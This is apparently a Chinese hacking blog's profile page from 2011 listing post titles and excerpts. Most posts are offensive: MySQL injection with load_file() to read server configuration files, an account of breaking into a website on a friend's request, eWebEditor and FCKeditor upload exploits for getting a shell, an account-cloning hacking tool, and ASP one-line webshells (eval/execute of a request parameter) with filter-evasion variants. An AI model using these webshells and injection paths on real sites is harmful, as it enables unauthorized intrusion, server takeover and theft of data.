- 博客(9)
- 资源 (1)
- 收藏
- 关注
原创 MYSQL注入中load_file()函数的进一步应用
<br /><br />文章已发表于《黑客防线》2008年第11期 转载请注明<br /> <br />MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件,如:<br />/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件<br />/usr/local/apache2/conf/httpd.conf<br />/usr/local/app/apache2/conf/extra
2011-04-29 02:44:00 609
转载 巧妙利用表自联偏移注入ACC数据库拿webshell(图)
<br />今天下午一朋友丢来一个网站说喜欢这个网站的源码,看能不能拿下,拿下以后说请我去腐败腐败。既然他都开口了,嘿嘿我还正愁没机会狠狠的蹭他几下,谁知道他自己找上门来了,不蹭白不蹭。先打开主站,用的是个通用防注入系统,过滤的很严格,对get跟post都进行了严格的参数过滤,转换编码格式也没能绕过注入系统,cookie注入也没能成功。后台也不能登陆,看来只能用旁注了。(如果有哪位大牛能突破这个通用防注入系统的话,不防发出来大家共享一下。)又拿出AK48,推荐一下这个工具,觉得比旁注王要好用一点,先有AK4
2011-04-25 18:40:00 1042
原创 Ewebeditor 2.1.6上传漏洞 UNION运用-直接得SHELL
<br />以前曾进过一个网站,把上传部份的asp代码下载回来研究,当时感觉有漏洞但没仔细研究,还以为那是他们自已写的程序。<br />前几天看到ewebeditor有漏洞的文章才想起那个网站原来用的也是ewebeditor。今天仔细看了看,发现问题了(2.1
2011-04-21 20:11:00 1200
原创 一句话木马及几种可绕过过滤格式
<br /><br />ASP一句话<br /> <br />1.<%eval request("YouPass")%><br /> <br />2. <%executerequest("YouPass")%><br /> <br />3. <%execute(request("YouPass"))%><br /> <br />免杀大部分网站的一句话<br /> <br />4.<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1"
2011-04-12 23:59:00 3836
原创 Aio.exe用法
All In One(AIO) V1.0 Build 06/10/2006 By WinEggDrop 这是一个将很多小工具功能集成一体的一个"工具". (如果你使用的是Build 04/01/2006版本,那版本中的syn扫描因编译时原因有些问题,请更新为Build 06/10/2006版本) 功能: 1.AutoRun -> 查看一般登陆后启动的项 用法:Aio.exe -AutoRun 2.Clone -> 克隆帐户
2011-04-12 23:42:00 1426
原创 MYSQL导出查询结果到文件
<br />SELECT order_id,product_name,qty FROM orders INTO OUTFILE '/data/data.txt'<br /> <br /><br />SELECT order_id,product_name,qty<br /> FROM orders<br /> INTO OUTFILE '/tmp/orders.csv'<br /> FIELDS TERMINATED BY ','<br /> ENCLOSED BY
2011-04-06 23:09:00 632
原创 网页编辑器漏洞手册
<br /><br />FCKeditor<br />FCKeditor编辑器页/查看编辑器版本/查看文件上传路径<br />FCKeditor编辑器页<br />FCKeditor/_samples/default.html<br />查看编辑器版本<br />FCKeditor/_whatsnew.html<br />查看文件上传路径<br />fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Comman
2011-04-04 15:01:00 1157
原创 ewebeditor不登陆后台也有机会拿shell
在数据库没被删掉的情况下。(默认:/db/ewebeditor.mdb)如果没删掉的话,把数据库给Down下来。然后打开,查看Style这里,看看“前人”有没有留下痕迹 看看表格内有没有上传过asp asa等这些类型的文件,如果有往下看。查找到这段:把那个s_light换成你刚才看到的样式名字,然后把链接补全。
2011-04-02 17:06:00 1002
青云服务器安全设置器V2011正式版
2011-09-04
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人